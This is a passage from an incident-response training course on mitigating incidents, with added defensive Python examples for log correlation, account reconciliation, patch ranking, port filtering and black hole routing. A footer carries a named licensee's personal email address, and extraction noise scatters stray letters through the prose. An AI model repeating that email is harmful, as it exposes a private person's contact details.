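2019-04-10T23:13:17 rd-fileserver-01 auth FAIL user=charles src=67.240.182.117 proto=rdp
2019-04-10T23:13:24 rd-fileserver-01 auth FAIL user=charles src=67.240.182.117 proto=rdp
2019-04-10T23:13:31 rd-fileserver-01 auth FAIL user=charles src=67.240.182.117 proto=rdp
2019-04-10T23:13:31 rd-fileserver-01 auth LOCKOUT user=charles src=67.240.182.117
2019-04-11T06:58:40 rd-fileserver-01 auth OK user=svc-backup src=10.10.5.20 proto=smb
2019-04-11T07:43:12 rd-fileserver-01 auth OK user=pat src=10.10.20.57 proto=smb
2019-04-11T07:43:15 rd-fileserver-01 file READ user=pat src=10.10.20.57 path=/rd/schematics/dt-2000.dwg
2019-04-11T08:02:03 rd-fileserver-01 auth FAIL user=charles src=10.10.20.11 proto=smb
"""

ON_LEAVE = {"pat": (datetime(2019, 4, 5), datetime(2019, 4, 14))}  # constructed HR data
FAIL_THRESHOLD = 4                  # this many failures from one source...
FAIL_WINDOW = timedelta(minutes=5)  # ...within this window is a burst


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    source: str    # log source on the host: "auth" or "file"
    kind: str      # FAIL, OK, LOCKOUT, READ
    fields: tuple  # sorted (key, value) pairs; keeps the event hashable

    def get(self, key, default=None):
        return dict(self.fields).get(key, default)


def parse(log: str) -> list:
    events = []
    for line in filter(str.strip, log.splitlines()):
        ts, host, source, kind, *kv = line.split()
        fields = tuple(sorted(tuple(p.split("=", 1)) for p in kv))
        events.append(Event(datetime.fromisoformat(ts), host, source, kind, fields))
    return events


def is_internal(ip: str) -> bool:
    return ip.startswith("10.")  # assumed internal range for the example


def correlate(events) -> list:
    indicators = []

    # Rule 1: a burst of failed logons against one account from one external
    # source, ending in a lockout, points at password guessing.
    failures = defaultdict(list)
    for e in events:
        if e.source == "auth" and e.kind == "FAIL" and not is_internal(e.get("src")):
            failures[(e.host, e.get("user"), e.get("src"))].append(e.ts)
    lockouts = {(e.host, e.get("user"), e.get("src")) for e in events if e.kind == "LOCKOUT"}
    for (host, user, src), times in failures.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= FAIL_WINDOW:
                j += 1
            if j - i + 1 >= FAIL_THRESHOLD:
                indicators.append({"rule": "external_failure_burst", "host": host,
                                   "user": user, "src": src, "count": j - i + 1,
                                   "lockout": (host, user, src) in lockouts})
                break

    # Rule 2: successful activity by an account whose owner is on leave. The
    # log alone cannot show this; the HR roster is the second source.
    for e in events:
        user = e.get("user")
        if e.kind in ("OK", "READ") and user in ON_LEAVE:
            start, end = ON_LEAVE[user]
            if start <= e.ts <= end:
                indicators.append({"rule": "activity_during_leave", "host": e.host,
                                   "user": user, "src": e.get("src"), "ts": e.ts.isoformat(),
                                   "detail": e.get("path") or e.get("proto")})

    # Rule 3: different indicators on one host are a candidate for a single
    # incident. This proposes the link; the analyst still has to prove it.
    rules_by_host = defaultdict(set)
    for ind in indicators:
        rules_by_host[ind["host"]].add(ind["rule"])
    for host, rules in rules_by_host.items():
        if len(rules) > 1:
            indicators.append({"rule": "same_host_candidate_link", "host": host,
                               "rules": sorted(rules)})
    return indicators


if __name__ == "__main__":
    for ind in correlate(parse(LOG)):
        print(ind)
```

The internal failed logon at 08:02 is deliberately not flagged: Charles trying his own locked account from his workstation is expected after a lockout, and treating it as an indicator would only add noise.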


TOPIC B
Mitigate Incidents
You've established an infrastructure and capability for incident handling and response. Now you
need to use that infrastructure to deal with events.

Countermeasures

A countermeasure is an action taken to defend against the effects of some unwanted event or incident. It is essentially synonymous with the idea of a security control, though "countermeasure" has connotations of being more active and direct in its defense. In any case, countermeasures come in the forms of the control categories mentioned earlier: technical, physical, and administrative. They are also applied in ways to prevent incidents from occurring as well as containing and eradicating incidents that are ongoing.

Instructor note: Make sure to put focus on the fact that some of these mitigation tactics can be applied both preventively and responsively.

Incident responders and other security personnel employ countermeasures in many different areas of the organization. There are some key points to consider when both designing and deploying such countermeasures:
• Document all actions and processes that are required to implement countermeasures.
• Document all tools, technologies, devices, and systems that both implement countermeasures and are affected by countermeasures.
• Identify the security requirements of your systems to help guide what countermeasures are applicable and necessary.
• Identify areas where systems are able to integrate with countermeasures, or modify those systems to enable such integration.
• Identify how certain systems interoperate with one another to ensure your countermeasures do not have gaps in coverage or have undesired effects on other systems.
• Identify existing safeguards and whether or not they are adequate, including security features inherent in systems, physical security, personnel security, and so on.
• Determine if there are any constraints imposed by management as far as what countermeasures you're allowed to implement.
• Test countermeasures in a non-production environment whenever possible.

Identity and Access Management (IAM)


Identity and access management (IAM) is the process of protecting how users and devices are represented in the organization, as well as how users and devices are granted access to resources based on this representation. IAM combines the sometimes distinct functions of identity management and access control into one comprehensive program. Concepts like authentication and authorization are also a large part of IAM systems.

Typical IAM tasks might include:
• Assigning and changing user access to company resources like specific devices, networks, or data.
• Resetting user passwords or other credentials.
• Tracking user activities.
• Creating and deprovisioning accounts.
• Synchronizing multiple identities.
• Enforcing identity and access control policies and procedures.
• Designing and maintaining identity systems.
• Evaluating identity-based threats and vulnerabilities.
• Maintaining compliance with government regulations.

Incident responders can leverage IAM to quickly contain and mitigate attacks that use accounts and other identity components as vectors. For example, a rogue account can quickly be deprovisioned to lock an attacker out of a targeted system. Disabling the account alone is not always enough: sessions that are already established, and tokens or Kerberos tickets issued before the change, may remain valid until they expire, so a credential reset and session revocation should accompany the disablement.
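The following Python is an added example, not part of the course, of how a responder can use IAM data to find accounts that should not exist or should not be enabled, and then derive the containment steps for each. It reconciles a directory export against the HR roster (accounts with no HR record, accounts of terminated staff still enabled, undocumented service accounts, and recently created accounts in privileged groups) and produces an ordered plan that disables, resets and revokes rather than relying on disablement alone. The export, roster, group names and approved service account list are constructed, and the function names are assumptions; in practice the export would come from AD/LDAP or a cloud IAM API and the actions would be carried out through it.

```python
"""Reconcile directory accounts against the HR roster and plan containment.

Added example for the IAM discussion; not part of the CFR course. The account
export, roster, group names and approved service accounts are constructed, and
the helper names are assumptions for this example.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import date

PRIVILEGED_GROUPS = {"Domain Admins", "Server Operators", "RD-Schematics-Admins"}
REVIEW_LOOKBACK_DAYS = 14   # privileged accounts created this recently get reviewed
TODAY = date(2019, 4, 11)   # fixed "today" so the example is reproducible


@dataclass
class Account:
    sam: str
    enabled: bool
    created: date
    groups: set = field(default_factory=set)
    owner_id: str | None = None    # HR employee ID; None for service accounts
    last_logon: date | None = None


@dataclass
class Employee:
    emp_id: str
    status: str   # "active" or "terminated"


# Constructed directory export.
ACCOUNTS = [
    Account("charles", True, date(2017, 3, 1), {"RD-Users"}, "E1001", date(2019, 4, 10)),
    Account("pat", True, date(2018, 6, 12), {"RD-Users"}, "E1002", date(2019, 4, 11)),
    Account("jdoe", True, date(2016, 1, 20), {"RD-Users"}, "E1003", date(2019, 3, 2)),
    Account("svc-backup", True, date(2016, 1, 20), {"Server Operators"}, None, date(2019, 4, 11)),
    Account("helpdesk2", True, date(2019, 4, 9), {"Domain Admins"}, "E9999", date(2019, 4, 10)),
]

# Constructed HR roster as of TODAY.
ROSTER = {
    "E1001": Employee("E1001", "active"),
    "E1002": Employee("E1002", "active"),
    "E1003": Employee("E1003", "terminated"),
}

# Service accounts that are documented and approved (assumed list).
APPROVED_SERVICE_ACCOUNTS = {"svc-backup"}


def find_rogue_accounts(accounts, roster, today: date) -> dict[str, list[str]]:
    """Return account name -> reasons it should be treated as suspect."""
    suspects: dict[str, list[str]] = {}

    def flag(acct, reason):
        suspects.setdefault(acct.sam, []).append(reason)

    for a in accounts:
        if not a.enabled:
            continue
        if a.owner_id is None:
            if a.sam not in APPROVED_SERVICE_ACCOUNTS:
                flag(a, "service account not in approved list")
        elif a.owner_id not in roster:
            flag(a, "no matching HR record")
        elif roster[a.owner_id].status == "terminated":
            flag(a, "owner terminated but account still enabled")
        if a.groups & PRIVILEGED_GROUPS and (today - a.created).days <= REVIEW_LOOKBACK_DAYS:
            flag(a, "privileged account created within review window")
    return suspects


def containment_plan(suspects: dict[str, list[str]], accounts) -> list[tuple[str, str]]:
    """Ordered (action, account) steps to lock an attacker out of each suspect
    account. Disabling alone leaves existing sessions and tokens valid, so
    credentials are reset and sessions revoked as well; logon history is kept
    for the investigation rather than deleted with the account."""
    by_name = {a.sam: a for a in accounts}
    plan = []
    for sam in sorted(suspects):
        plan.append(("disable", sam))
        plan.append(("reset_credentials", sam))
        plan.append(("revoke_sessions", sam))
        for g in sorted(by_name[sam].groups & PRIVILEGED_GROUPS):
            plan.append((f"remove_from:{g}", sam))
        plan.append(("preserve_logon_history", sam))
    return plan


if __name__ == "__main__":
    found = find_rogue_accounts(ACCOUNTS, ROSTER, TODAY)
    for sam, reasons in found.items():
        print(sam, "->", "; ".join(reasons))
    for step in containment_plan(found, ACCOUNTS):
        print(step)
```

In the constructed data, the account of a terminated employee is still enabled, and a two-day-old account in Domain Admins has an owner ID that HR does not recognize; both are flagged, while the documented service account and the active users are left alone.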

IAM Solutions
There are many IAM solutions. Most IAM services offered through cloud platforms have a similar set of features, including many of those listed previously. The following are some common examples.
• AWS Identity and Access Management is part of the Amazon Web Services® cloud platform.
• Microsoft Azure Active Directory is part of the Microsoft® Azure® cloud platform.
• Google Cloud Identity and Access Management is part of Google Cloud Platform™.
• IBM Identity and Access Management is part of IBM® Cloud.
• Oracle Identity Cloud Service is part of Oracle® Cloud Platform.

Some IAM solutions that are not specific to the cloud include:
• SolarWinds Access Rights Manager, which enables an organization to manage and audit access rights in an Active Directory® environment.
• The Protected Users group in an Active Directory environment, which disables potential attack vectors used in authentication for any users assigned to this group. For example, credentials are not cached locally, so the user must be able to connect to the domain controller in order to sign in. Other potential vectors, like NTLM and long-term Kerberos keys, are also either disabled or reduced in functionality.
• The group Managed Service Account (gMSA) in an Active Directory environment, which enables the Windows operating system to manage the password of a single security principal account used by multiple instances of a service, rather than requiring an administrator to manage the password. This makes it easier for each service instance to synchronize with a single identity, keeping each individual instance opaque to the authenticating user.

Patch and Update Management


Patch management, also called update management, ensures the timely and consistent collection, evaluation, testing, and deployment of software fixes. Vendors update operating systems, applications, device drivers, and firmware on a regular basis to address known vulnerabilities. It is critical to keep your software and hardware updated to take advantage of these improvements. Attackers may target these vulnerabilities, knowing some organizations may be slow to remediate them.

Patch management is an essential countermeasure in both the preventive and responsive sense: you patch your critical software to eliminate security vulnerabilities attackers can exploit, while also patching software to stop an ongoing exploit or recover from the effects of an exploit that's already concluded. Keep in mind that patching a host that is already compromised closes the entry point but does not remove what the attacker installed through it; eradication still has to happen separately. Whether you're updating high-level desktop application software or low-level device firmware, your management program needs to consider the scope of the changes, including how many devices or environments require the patch and what kind of downtime, if any, applying the patch will require. You should also identify more attributes about the patches themselves, like where they come from, how they function, and what vulnerabilities they are meant to fix, so you'll be better informed.

As you update your systems, be sure to also update any policies, procedures, configurations, and monitoring references (or baselines) that may be affected.
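Deciding which missing patch to apply first across a fleet is where the scope and exposure considerations above turn into a concrete ordering. The following Python is an added example, not part of the course: it compares installed versions against the versions that carry each fix, using a numeric version comparison rather than string comparison (where "4.10" would wrongly sort before "4.9"), and ranks the gaps by vendor severity, remote exploitability and whether the host is Internet-facing. The inventory is constructed, and the advisory identifiers are placeholders, not real CVE or vendor bulletin numbers.

```python
"""Rank missing patches across a fleet by severity and exposure.

Added example for the patch management discussion; not part of the CFR
course. The host inventory and advisories are constructed, and the advisory
identifiers are placeholders rather than real CVE or vendor bulletin IDs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Advisory:
    ident: str     # placeholder identifier
    product: str
    fixed_in: str  # first version that contains the fix
    severity: int  # 1 (low) .. 4 (critical), as published by the vendor
    remote: bool   # exploitable over the network without local access


@dataclass
class Host:
    name: str
    internet_facing: bool
    installed: dict  # product -> installed version string


def version_key(v: str) -> tuple:
    """Split '4.1.2b' into comparable pieces: numbers compare numerically and
    letters lexically, so '4.10' > '4.9' and '1.1.0g' < '1.1.1b'."""
    parts = re.findall(r"\d+|[A-Za-z]+", v)
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)


def missing_patches(hosts, advisories) -> list:
    """Return (host, advisory) pairs where the installed version predates the fix."""
    missing = []
    for h in hosts:
        for a in advisories:
            installed = h.installed.get(a.product)
            if installed is not None and version_key(installed) < version_key(a.fixed_in):
                missing.append((h, a))
    return missing


def priority(host: Host, adv: Advisory) -> int:
    """Higher is more urgent. A remotely exploitable flaw on an Internet-facing
    host outranks a higher vendor severity that needs local access, because
    the former is what attackers scan for first."""
    score = adv.severity * 10
    if adv.remote:
        score += 15
        if host.internet_facing:
            score += 30
    return score


def patch_plan(hosts, advisories) -> list:
    """(host, advisory, product, fixed_in, priority) rows, most urgent first."""
    pairs = missing_patches(hosts, advisories)
    pairs.sort(key=lambda ha: (-priority(*ha), ha[0].name, ha[1].ident))
    return [(h.name, a.ident, a.product, a.fixed_in, priority(h, a)) for h, a in pairs]


# Constructed inventory and advisories.
HOSTS = [
    Host("web-01", True, {"nginx": "1.14.0", "openssl": "1.1.0g"}),
    Host("rd-fileserver-01", False, {"samba": "4.9.5", "openssl": "1.1.1a"}),
    Host("wks-pat", False, {"acrobat-reader": "19.010.20064", "openssl": "1.1.1b"}),
]
ADVISORIES = [
    Advisory("ADV-EX-001", "openssl", "1.1.1b", 3, True),
    Advisory("ADV-EX-002", "nginx", "1.14.2", 4, True),
    Advisory("ADV-EX-003", "samba", "4.9.6", 3, True),
    Advisory("ADV-EX-004", "acrobat-reader", "19.010.20069", 4, False),
]

if __name__ == "__main__":
    for row in patch_plan(HOSTS, ADVISORIES):
        print(row)
```

The Internet-facing web server's two remotely exploitable gaps come out on top, the internal file server's remote issues next, and the workstation's critical but local-only reader flaw last; a host already at the fixed version does not appear at all.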

Mobile Device Management (MDM)


The practice of mobile device management (MDM) tracks, controls, and secures the organization's mobile infrastructure. MDM solutions are often web-based platforms that enable administrators to work from a centralized console. Common features of MDM solutions include:

• Device enrollment and authentication.
• Remote lock and wipe.
• Locating devices through the Global Positioning System (GPS) and other technologies.
• Pushing out OS, app, and firmware updates to devices.
• Preventing root access or jailbreaking of devices.
• Constructing an encrypted container on devices in which to keep sensitive organization data.
• Restricting certain features and services based on access control policies.

Figure 10-2: An example of an MDM console.

If the organization establishes MDM before an incident, first responders can use the administrative console in a number of ways to mitigate incidents that affect mobile devices. For example, if a manager's phone is misplaced or stolen and contains sensitive company information, the CSIRT can remotely wipe the device from the MDM console. Likewise, the responders will have an easier time locating the device if it's transmitting GPS coordinates. If malware that targets mobile OSs finds its way onto employees' devices, the CSIRT can quickly push out patches to every device once the vendor makes the patches available. These are just some examples of how an MDM process can harden the often-overlooked security of mobile devices during an incident.

Physical Security
ot

Physical security is also an important domain for designing and deploying countermeasures. In some Physical Security
organizations, personnel from a Facilities department may be in charge of physical security, distinct
N

from the IT security group; however, more and more organizations are combining physical security
responsibilities and technical and administrative responsibilities under one domain. In doing so, the
CSIRT is kept better informed and has more access to tools and techniques that could help them
o

prevent or mitigate an incident.


D

There are many physical security controls the incident responder might employ or at least be aware This is not an exhaustive
of. Some major examples include: list, and a deeper dive
into physical security is
• Barriers, including fences, walls, doors, and windows. beyond the scope of this
• Locks, including key locks, deadbolts, combination locks, access card locks, and biometric locks. course.
• Storage, including containers, safes, and vaults.
• Surveillance, including security cameras and audio recording equipment.
• Alarms, including lights, bells, sirens, and local or remote console alerts.

Lesson 10: Responding to Cybersecurity Incidents | Topic B


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
410 | CyberSec First Responder® (Exam CFR-410)

• Guards, including human security guards and guard dogs.


• Logs, including visitor logs and employee building access logs.

System Hardening
System hardening is the process by which a host or other device is made more secure through the reduction of that device's attack surface. Hardening is most effective as a preventive measure when designing system security, but this is not always feasible given the constraints of time, money, and the need for convenience. However, hardening can be useful after an incident has occurred to shut down any lingering effects or purge a system of an infection. Hardening can also remove and prevent further unauthorized users from accessing compromised systems.

Instructor note: Consider pointing students to https://www.cisecurity.org/cis-benchmarks/ for more system hardening best practices.

There are many potential approaches to hardening, each of which may be better served in certain contexts. The following are some examples:
• Deactivate unnecessary components, including hardware, software, network ports, operating system processes and services, and applications. When not in use, these components may slip by your detection, enabling an attacker to stealthily use them as a vector or target of an attack.
• Disable unused user accounts. Accounts like the system's defaults or those of terminated employees are more potential vectors that can go unnoticed.
• Strengthen authentication methods, like enforcing multi-factor authentication and strong password requirements.
• Apply hotfixes and other patches that will enable you to quickly correct system vulnerabilities.
• Restrict host access to peripheral protocols like Universal Serial Bus (USB) and Bluetooth. Attackers with physical access to systems can easily bypass many security measures if they can simply plug in a USB drive loaded with malware.
• Restrict shell commands per user or per host for least-privilege purposes. Having shell access can give the attacker a great deal of power over a system, so it's best to reduce its functionality if affected by an incident.


Isolation
lic

Isolation One of the most crucial mitigation strategies you can employ for almost all types of incidents is
isolation. Isolation involves removing an affected component from whatever larger environment it is
a part of. This can be everything from removing a server from the network after it has been the
up

target of a DoS attack, to placing an application in a sandbox virtual machine (VM) outside the host
environments it usually runs on.
Whatever the circumstances may be, you'll want to make sure there is no longer an interface
D

between the affected component and the outside world. The most obvious reason has to do with
malware infections, particularly fast-spreading worms and viruses. If a server infected with a worm is
still connected to the rest of its subnet, the worm could easily make its way to other hosts on that
ot

subnet. Disconnecting the server could mean the difference between disinfecting hundreds of
devices and just one. Beyond literally pulling the plug on a server, you can also move it to a new
subnet to logically segment it from the rest of the network. Another method of server isolation is to
N

use a jump box—a hardened host from which authorized personnel access other hosts in a trusted
security zone. If the jump box is truly secure, moving affected systems behind it will help contain
further compromise from attackers.
o

Applications you suspect may be the vector of an attack can be much less effective to the attacker if
D

the application is no longer running on workstations or servers in normal production mode. The
app can be isolated to remove that point of compromise by moving it to a new host or a VM guest
running on that host.

Lesson 10: Responding to Cybersecurity Incidents | Topic B

Figure 10-3: Isolating a compromised server on a different subnet through network segmentation.

Honeypot

A honeypot is a practice that traps attackers in an isolated environment where they can be monitored and kept from compromising systems in production. The honeypot tricks the attacker into believing they are causing actual damage to a system, which enables the security team to analyze the attacker's behavior. This can help the security team identify the source of the attack, and take more comprehensive steps to completely eradicate the threat from the organization. For example, an organization constructs a database full of benign or meaningless data disguised as important financial records. The organization places the database behind a subnet with lowered defenses, which baits an attacker into attempting to exfiltrate this useless data.

Bastion Host

A bastion host is an alternative to a jump box that segments and isolates network resources for the purposes of securing access. Whereas a jump box is a hardened server within the security zone the user is trying to access, essentially making it a bridge between two separate security zones, a bastion host connects a trusted zone to a trusted zone or an untrusted zone to a trusted zone. It does not enable direct access to a trusted zone, but it does provision resources and services from within the trusted zone to external users or devices.

The bastion host is therefore a single point of attack from which users from untrusted networks like the Internet can access resources and services that need to be kept isolated and secure. The organization can more easily protect, maintain, and monitor this system they expect to be attacked.

Bastion hosts are usually firewalls, DNS servers, email servers, web servers, or any other type of server that faces a public network. These hosts provide specific services to users.

Consider the following analogy: A jump box is like a guard for your main office building. When someone from a branch office visits, they must be granted access by the guard before they can enter. Once inside, the visitor has access to the building, though not necessarily total access if other security controls are in place. Now, consider that a bastion host is like a bank teller. A customer wants to withdraw money from the bank. The teller provides this service for the customer, and the customer is never granted access to the bank vault itself.

Figure 10-4: A bastion host sits outside the internal network and can provision resources to users making requests from external networks like the Internet.

Blacklisting

Blacklisting is the process of blocking known applications, services, traffic, and other transmissions to and from your systems. Blacklists, also called block lists, are created when the organization knows the source or mechanism of a potential threat and determines this threat can be shut out from the organization entirely.

Blacklists are useful in incident response for their ability to block the source of malware. The source can be external to the organization, or it can be positioned internally through persistence techniques like rootkits and logic bombs. As an example of an external source, consider that the users in your organization are having their workstations infected by malvertisements on seemingly legitimate websites. The advertisements are not necessarily localized to one site, so it may not be effective to simply prevent users from visiting one particular site. Instead, you can implement ad blocking or script blocking software on the users' workstations, or adjust your organization's web filter to block URL requests for known advertisement domains. Constructing a blacklist of domains, sites, or technologies that can be a vessel for malware will help stop an infection from spreading.

As an example of an internal source of malware, assume that you've uncovered evidence of logic bombs going off under unknown circumstances. You do know the effect (encrypting the user's drive to use as ransom), and you know how it spreads—through several different TCP/IP ports. So, your blacklist could include the port numbers you know the logic bomb uses to spread, and if you implement the blacklist at the firewall, you can help prevent more hosts from being infected.

Limitations

There are two main limitations of blacklists. The first is the risk of false positives, in which you block a site, service, port, and so on, that actually has legitimate uses. This can end up being a sort of collateral damage in an attempt to defend against a malware attack with many vectors or vectors commonly used in normal operations. The other main weakness of blacklisting is everything that you don't know. You can't possibly know every single malicious attack vector out there, and the ones on the list might not be comprehensive enough. You're essentially running the blacklist from a limited perspective, one that can't possibly catch up to the ever-changing world of malware and other threats.

Whitelisting

Whitelisting is a response to the blacklist's problem of what you don't know. In a whitelist, also called an allow list, you block everything except what you trust. In the external malvertisement example, you could create a list of advertisement domains you know to be legitimate, and filter out the rest. It's much easier to account for what you know is safe or acceptable.

In response to an ongoing incident, whitelisting may be the better alternative when confirming and researching malicious sources would be too time consuming, or when those sources change too often. You're much more likely to know right away what's friendly than to spend time identifying every possible foe. You may have missed a port that the logic bomb uses to communicate, and that your blacklist doesn't account for. That will enable the infection to spread, despite your efforts. If you enforce a whitelist of all legitimate ports, however, then this unknown port would likely have been blocked.

Whitelisting is also useful in keeping a list of applications that a host can install, or network addresses it can communicate with. If a user's workstation needs only a word processor, a spreadsheet program, and not much else, then all other software (including malicious software) can default to being blocked while the CSIRT contains and mitigates the incident.

Limitations

Whitelists are usually a safer bet in incident mitigation, but they're not flawless. They can be incredibly restrictive, preventing users and systems from transmitting data to new or changing recipients. They need to be constantly fine-tuned to avoid interference with business operations, which can be cost- and time-prohibitive for some organizations.

Note: To summarize, whitelisting is preferred as the default preventative tactic, whereas blacklisting is best used as a reactive tactic when you know the specific sources of an incident.
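The trade-off described above, as an added example that is not part of the course text: a small packet-filter simulation in Python in which a blacklist of the logic bomb's known ports misses the port the team has not yet discovered, while a whitelist of business ports stops it but also blocks an in-house tool that shares a port with the malware. All ports, addresses and flows are constructed.

```python
"""Blacklist vs. whitelist port filtering for the logic-bomb scenario.

Added example, not from the CFR-410 course text. The flows, port numbers
and the malware's "unknown" propagation port are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    label: str  # ground truth ("legit" or "malicious"); used only to score the policy


def blacklist_filter(blocked_ports: set) -> Callable[[Flow], str]:
    """Default allow: drop only traffic to ports known to be used by the malware."""
    def decide(flow: Flow) -> str:
        return "drop" if flow.dport in blocked_ports else "allow"
    return decide


def whitelist_filter(allowed_ports: set) -> Callable[[Flow], str]:
    """Default deny: allow only traffic to ports the business actually needs."""
    def decide(flow: Flow) -> str:
        return "allow" if flow.dport in allowed_ports else "drop"
    return decide


def score(policy: Callable[[Flow], str], flows: Iterable[Flow]) -> dict:
    """Score a policy against ground truth.

    missed        = malicious flows that got through (the infection keeps spreading)
    blocked_legit = legitimate flows dropped (collateral damage / false positives)
    """
    stats = {"blocked_malicious": 0, "missed": 0, "allowed_legit": 0, "blocked_legit": 0}
    for flow in flows:
        decision = policy(flow)
        if flow.label == "malicious":
            stats["blocked_malicious" if decision == "drop" else "missed"] += 1
        else:
            stats["allowed_legit" if decision == "allow" else "blocked_legit"] += 1
    return stats


# Constructed traffic sample. The responders have observed the logic bomb
# spreading over TCP 6200 and 7777; they have NOT yet seen it use 9999.
SAMPLE_FLOWS = [
    Flow("10.0.1.10", "10.0.1.20", 443, "legit"),       # HTTPS to an internal web app
    Flow("10.0.1.10", "10.0.1.53", 53, "legit"),        # DNS
    Flow("10.0.1.11", "10.0.1.30", 445, "legit"),       # SMB file share
    Flow("10.0.1.12", "10.0.1.40", 7777, "legit"),      # in-house tool sharing a port with the malware
    Flow("10.0.1.50", "10.0.1.51", 6200, "malicious"),  # known propagation port
    Flow("10.0.1.50", "10.0.1.52", 7777, "malicious"),  # known propagation port
    Flow("10.0.1.50", "10.0.1.60", 9999, "malicious"),  # propagation port not yet discovered
]

KNOWN_MALWARE_PORTS = {6200, 7777}
BUSINESS_PORTS = {443, 53, 445}


def compare(flows: Iterable[Flow] = SAMPLE_FLOWS) -> dict:
    """Return the scores of both approaches side by side."""
    flows = list(flows)
    return {
        "blacklist": score(blacklist_filter(KNOWN_MALWARE_PORTS), flows),
        "whitelist": score(whitelist_filter(BUSINESS_PORTS), flows),
    }


if __name__ == "__main__":
    for name, stats in compare().items():
        print(f"{name:9s} {stats}")
```

The blacklist lets the undiscovered port through and still produces a false positive; the whitelist stops all three malicious flows, at the cost of the in-house tool, which is the restrictiveness the Limitations paragraph warns about.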

DNS Filtering

As you've seen, one of the mechanisms involved in blacklisting and whitelisting is filtering. Domain Name System (DNS) filtering, also called web filtering, is the process of restricting what kind of lookup requests are validated within an organization. The typical DNS process translates a common site name into an IP address and returns it to the user making the request. If you place a filter on your DNS, however, the DNS lookup can be halted if it detects a name/IP address on its filter (blacklist) or not on its filter (whitelist). Instead of returning the untrusted site to the user, the filter will usually redirect them to a local server with a block message.

Figure 10-5: A DNS filter has blocked a user from viewing an untrusted site.

During an incident, a DNS filter can help prevent users from downloading more malware onto their systems and increasing the incident's magnitude. Filtering at the DNS level is easy to apply organization-wide and can save you from scrambling to each and every workstation to apply your mitigation locally. It won't remove an infection or mitigate other types of incidents, but it's an effective method of malware containment nonetheless. However, it's important to note that, if users don't actually use your DNS servers for lookup, they may be able to bypass filtering.

Black Hole Routing

In network architecture, a black hole drops traffic before it reaches its intended destination, without alerting the source. A simple example is traffic that is sent to an IP address that has been mapped to a non-existent host. Since the destination does not exist (the figurative black hole), the inbound traffic is discarded. In order for the source not to be alerted about the discarded traffic, it must transmit the traffic using a connectionless and unreliable protocol like User Datagram Protocol (UDP), rather than a protocol like Transmission Control Protocol (TCP) that attempts to verify delivery.

Like DNS filtering, you can use black holes in conjunction with blacklists/whitelists to filter out unwanted traffic sources that may contain malware. However, a more common and effective way to use black holes is by dropping packets at the routing layer to stop a DDoS attack. Using a Cisco router, for example, traffic can be sent to the null0 interface. This interface automatically drops all traffic. If you know the source address range(s) of a DDoS attack, you can silently drop that traffic by configuring the router to send the attacking range(s) to null0.

Black hole routing may be more beneficial than other methods of traffic filtering because it tends to consume fewer router resources. Processing overhead for implementing firewall rules or DNS filtering is much higher, and when you're trying to mitigate a DDoS attack, every bit of bandwidth helps. It's extremely important, however, for you to recognize the high potential for collateral damage in routing entire IP address ranges into black holes. The most successful DDoS attacks launch from disparate IP addresses—addresses that are in ranges shared with many legitimate users. Blocking an entire range to stop just a handful of sources may, ironically, end up denying your services even more.
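To make the collateral-damage point concrete, here is an added Python example (not the course's code) that models a forwarding table with Null0 entries and longest-prefix matching, then compares black-holing whole ranges against black-holing only the observed attack sources. Prefixes, attacker and customer addresses are constructed, and looking up the source address on the router is assumed to be paired with unicast reverse-path forwarding.

```python
"""Black hole routing and its collateral damage.

Added example, not the course's own code. A routing table holds Null0
entries for suspected attack ranges; any address whose longest-matching
prefix is a Null0 entry is silently discarded. The lookup here is on the
packet's source address, as the text describes dropping attacking source
ranges (on a real router that pairing needs unicast reverse-path forwarding,
which is assumed). All prefixes and addresses are constructed.
"""
import ipaddress
from typing import Iterable, List, Optional, Tuple


class RoutingTable:
    def __init__(self) -> None:
        self.routes: List[Tuple[ipaddress.IPv4Network, str]] = []

    def add(self, prefix: str, next_hop: str) -> None:
        self.routes.append((ipaddress.ip_network(prefix), next_hop))

    def lookup(self, addr: str) -> Optional[str]:
        """Longest-prefix match, as a router's forwarding table does."""
        ip = ipaddress.ip_address(addr)
        matches = [(net, hop) for net, hop in self.routes if ip in net]
        if not matches:
            return None
        return max(matches, key=lambda m: m[0].prefixlen)[1]

    def blackholes(self) -> List[str]:
        return [str(net) for net, hop in self.routes if hop == "Null0"]


def assess(table: RoutingTable, attackers: Iterable[str], legit_users: Iterable[str]) -> dict:
    """Count attack sources that are dropped and legitimate users caught as collateral."""
    return {
        "dropped_attackers": sum(table.lookup(a) == "Null0" for a in attackers),
        "collateral": [u for u in legit_users if table.lookup(u) == "Null0"],
    }


def coarse_plan(ranges: Iterable[str]) -> RoutingTable:
    """Black-hole whole ranges: quick to configure, high collateral risk."""
    table = RoutingTable()
    table.add("0.0.0.0/0", "Gi0/1")  # default route toward the upstream provider
    for r in ranges:
        table.add(r, "Null0")
    return table


def precise_plan(attacker_ips: Iterable[str]) -> RoutingTable:
    """Black-hole only the observed sources, collapsed into the fewest prefixes."""
    table = RoutingTable()
    table.add("0.0.0.0/0", "Gi0/1")
    hosts = [ipaddress.ip_network(f"{ip}/32") for ip in attacker_ips]
    for net in ipaddress.collapse_addresses(hosts):
        table.add(str(net), "Null0")
    return table


# Constructed observation: attack sources cluster in a /24 that customers also use.
ATTACKERS = ["203.0.113.10", "203.0.113.11", "203.0.113.12", "203.0.113.200", "198.51.100.7"]
LEGIT_USERS = ["203.0.113.50", "203.0.113.201", "192.0.2.9"]


def compare_plans() -> dict:
    """Both plans drop every attacker; only the coarse one also drops customers."""
    coarse = coarse_plan(["203.0.113.0/24", "198.51.100.0/24"])
    precise = precise_plan(ATTACKERS)
    return {
        "coarse": {**assess(coarse, ATTACKERS, LEGIT_USERS), "entries": len(coarse.blackholes())},
        "precise": {**assess(precise, ATTACKERS, LEGIT_USERS), "entries": len(precise.blackholes())},
    }


if __name__ == "__main__":
    for name, result in compare_plans().items():
        print(name, result)
```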

Figure 10-6: Black hole routing dropping malicious traffic.

Secure Erasure and Disposal

